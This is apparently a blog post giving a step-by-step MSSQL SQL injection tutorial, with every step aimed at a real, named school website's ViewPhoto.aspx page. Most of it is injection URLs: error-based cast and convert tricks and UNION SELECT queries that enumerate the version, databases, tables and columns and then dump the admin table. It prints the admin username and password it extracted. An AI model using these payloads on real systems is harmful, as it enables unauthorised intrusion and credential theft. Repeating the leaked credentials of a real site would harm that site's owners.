Pages

Sunday, March 24, 2013

mssql server injection tutorial

This is how i injected mssql server or .aspx.

vul link=http://ogis.edu.in/ViewPhoto.aspx?gid=46

1st way:
Finding version:

Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 or 1=cast(@@version as int)

Finding database:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 or 1=convert(int,db_name())

I will not go for deep about this method.There is already tutorial about it here.

2nd way:
1.Finding no of columns:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 1-- -

it loads normal.Thats good. 
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 10-- -
output:
[Image: 54025460.jpg]

so lets reduce it
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 9-- -

Page loads normal.So there are 9 columns.

2. Next we do UnIOn all seLect .
Remember in mssql with aspx you will never get vul columns.You have to find it manually.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -
output:
[Image: 54898417.jpg]

Dont worry.Now two ways from here.

1 way (easy) : this way will work rarely and its normal injection.

Just change gid=46 to gid=-46.
so injection will be
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -
output:
[Image: 50983947.jpg]

vul col=2
version=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,@@version,3,4,5,6,7,8,9-- -
@@version gives version in mssql . 
Remember version() will not work here.

user=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,user_name(),3,4,5,6,7,8,9-- -

You can also use current_user , user , system_user instead of user_name() .

database=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(),3,4,5,6,7,8,9-- -
db_name() gives primary database.

Now replace db_name() with db_name(1),db_name(2),..,db_name(n) till you get databases.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(1),3,4,5,6,7,8,9-- -
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(11),3,4,5,6,7,8,9-- -

Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,schema_name,3,4,5,6,7,8,9 from information_Schema.schemata-- -
This gives all databases in one.
[Image: 93957090.jpg]

Tables=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,table_name,3,4,5,6,7,8,9 from information_Schema.tables where table_schema!=db_name()-- -
Here !=db_name() means other than primary database.
So we get tables of other databases. spicy table is o_adminmst.
[Image: 82377563.jpg]

columns=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,column_name,3,4,5,6,7,8,9 from information_Schema.columns where table_name='o_adminmst'-- -
[Image: 53670075.jpg]

data=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,username,3,4,5,6,7,8,9 from o_adminmst-- -
username=admin
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,password,3,4,5,6,7,8,9 from o_adminmst-- -
pass=admin123#.

2nd way(important) : This way will work with UnIoN in many sites and challenges.
Lets You stuck here :
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -

Now replace all columns with NULL
so it will like 
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT null,null,null,null,null,null,null,null,null-- -

Now starts replacing every null with convert(int,@@version) or cast(version() as int).

In my case replacing with first null gives answer.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,@@version),null,null,null,null,null,null,null,null-- -
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(@@version as int),null,null,null,null,null,null,null,null-- -
[Image: 52115856.jpg]

user=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(user_name() as int),null,null,null,null,null,null,null,null-- -
output=
Conversion failed when converting the nvarchar value 'db_ogis' to data type int. 

You can also use current_user , user , system_user instead of user_name() .

database=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(db_name() as int),null,null,null,null,null,null,null,null-- -

output=
Conversion failed when converting the nvarchar value 'db_ogis' to data type int. 

Tables=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 table_name from information_schema.tables where table_schema!=db_name())) ,null,null,null,null,null,null,null,null-- -

output=Conversion failed when converting the nvarchar value 'o_updatemst' to data type int. 

for next table
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 table_name from information_schema.tables where table_schema!=db_name() and table_name<>'o_updatemst')) ,null,null,null,null,null,null,null,null-- -

output=Conversion failed when converting the nvarchar value 'o_pagemaster' to data type int. 

columns=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 column_name from information_schema.columns where table_name='o_adminmst')) ,null,null,null,null,null,null,null,null-- -

Conversion failed when converting the nvarchar value 'adminid' to data type int. 

for next column same as table
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 column_name from information_schema.columns where table_name='o_adminmst' and column_name<>'adminid')) ,null,null,null,null,null,null,null,null-- -

Conversion failed when converting the nvarchar value 'username' to data type int. 

data=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 username from o_adminmst)) ,null,null,null,null,null,null,null,null-- -

Conversion failed when converting the varchar value 'admin' to data type int. 
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 password from o_adminmst)) ,null,null,null,null,null,null,null,null-- -

Conversion failed when converting the varchar value 'admin123#' to data type int. 

You can use %2b to get username and password at one time.
%2b=+
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 username%2b'/'%2bpassword from o_adminmst)) ,null,null,null,null,null,null,null,null-- -

Conversion failed when converting the varchar value 'admin/admin123#' to data type int.


 source : http://ultimatehackingarticles.blogspot.com

No comments:

Post a Comment